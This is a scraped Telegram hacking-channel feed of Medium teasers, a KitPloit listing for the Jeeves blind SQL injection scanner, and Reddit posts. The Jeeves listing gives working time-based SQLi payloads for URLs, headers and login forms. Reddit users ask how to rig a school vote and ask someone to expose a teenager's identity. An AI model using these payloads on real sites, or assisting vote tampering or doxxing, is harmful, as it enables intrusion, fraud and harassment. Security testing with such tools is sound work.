Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How Mom Got Hacked

https://cdn-images-1.medium.com/max/1722/1*uM_iiAALh4CBC-tnNrK6lw.jpeg
I never realized how easy it was to get a username and password to an email account until my mother was hacked. Listening to her explain…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hack the Box: Devel — Writeup

https://cdn-images-1.medium.com/max/1213/1*TG1cQqv4o3R4BnIWg8RDSg.png
Devel is an easy-rated retired Hack the Box machine that is vulnerable to MS11–046. This vulnerability is in the Ancillary Function Driver…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
THE GAMING MAN

https://cdn-images-1.medium.com/max/738/1*u_Wufaooc2xOIjhO_lgllQ.jpeg
Weaned on oral learning, I believe that oral knowledge dies with its bearers, and that fresh ideas are suppressed by censors.In my own…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Jeeves - Time-Based Blind SQLInjection Finder

https://blogger.googleusercontent.com/img/a/AVvXsEjwZ8dEQeF3stp-XvrZJ8rzWOoJ7mPB5N-FQFgsVhPdIC4EF5dpCLHNu3i2Cwo3lhI57zv8vanLAjhpmm06YjZspcRj4mZ9kUcw-6FiUfPKssIOyZigTwb_K_HtESqNyKyoZO_aFiVU_EGr9Q0WlY9yRRLwBGyGOMZi8ZHHJ0xawHTF8wRpkSbFCIyz=s320 Jeeves is made for looking to Time-Based Blind SQLInjection through recon.- Installation & Requirements:Installing Jeeves

$ go install github.com/ferreiraklet/Jeeves@latestOR $ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h
- Usage & Explanation:In Your recon process, you may find endpoints that can be vulnerable to sql injection, Ex: https://redacted.com/index.php?id=1 Single urlsecho 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10
In --payload-time you must use the time mentioned in payload From listcat targets | jeeves --payload-time 5Adding HeadersPay attention to the syntax! Must be the same => echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"Using proxyecho "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"
Proxy + Headers => echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"Post RequestSending data through post request ( login forms, etc )

Pay attention to the syntax! Must be equal! -> echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"
Another ways of UsageYou are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght
Command line flags:

traffic to a proxy -c Set Concurrency, Default 25 -H, --headers Custom Headers -d, --data Sending Post request with data -h Show This Help Message">Usage:
-t, --payload-time, The time from payload
-p, --proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, --headers Custom Headers
-d, --data Sending Post request with data
-h Show This Help Message

Using with sql payloads wordlist cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;doneTesting in headers echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Payload credit: https://github.com/rohit0x5
OBS:

* Does not follow redirects, If the Status Code is diferent than 200, it returns "Need Manual Analisys"
* Jeeves does not http probing, he is not able to do requests to urls that does not contain protocol ( http://, https:// ) This project is for educational and bug bounty porposes only! I do not support any illegal activities!.If any error in the program, talk to me immediatly. Please, also check these => Nilo - Checks if URL has status 200 SQLMAP Blisqy Header time based SQLI Download Jeeves
hacking: security in practice
My internet went down twice inside of 3 hours...

The ISP gave me $5 the first time and $4 the second time (because I contacted them)... it's not really hacking but I have a feeling most people don't get credited... I have a script running every minute to alert me if my Internet goes down.

submitted by /u/Free-Speech-101
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Purely theoretically manipulate a survey

So in theory we have a survey that asks for the email address and then sends you a link in the form: https://vote.org//?key=(random key)&active=(random letters). you could theoretically change this key and that would count as a vote. Unfortunately, these email addresses are also saved, so it is noticeable if you only change the key. theoretically, you could also take a gmail address and make it a "new" email address with dots or + signs. but that would also be noticeable. do you have any other ideas on how to circumvent this school voting theorethically?

submitted by /u/RobRoy1702
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Justice?

This is a long shot but the verdict in this case makes me angry. I’m a complete outsider to the case - I just feel lucid with anger at the lack of justice. A teen drives recklessly under the influence of something and almost kills a mother and her 8 month old. His punishment? Five months in a teen camp and his record expunged when he turns 18. Is this justice? Anyone capable of making his identity public to shame him for the rest of his life?

submitted by /u/Loopsquare
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video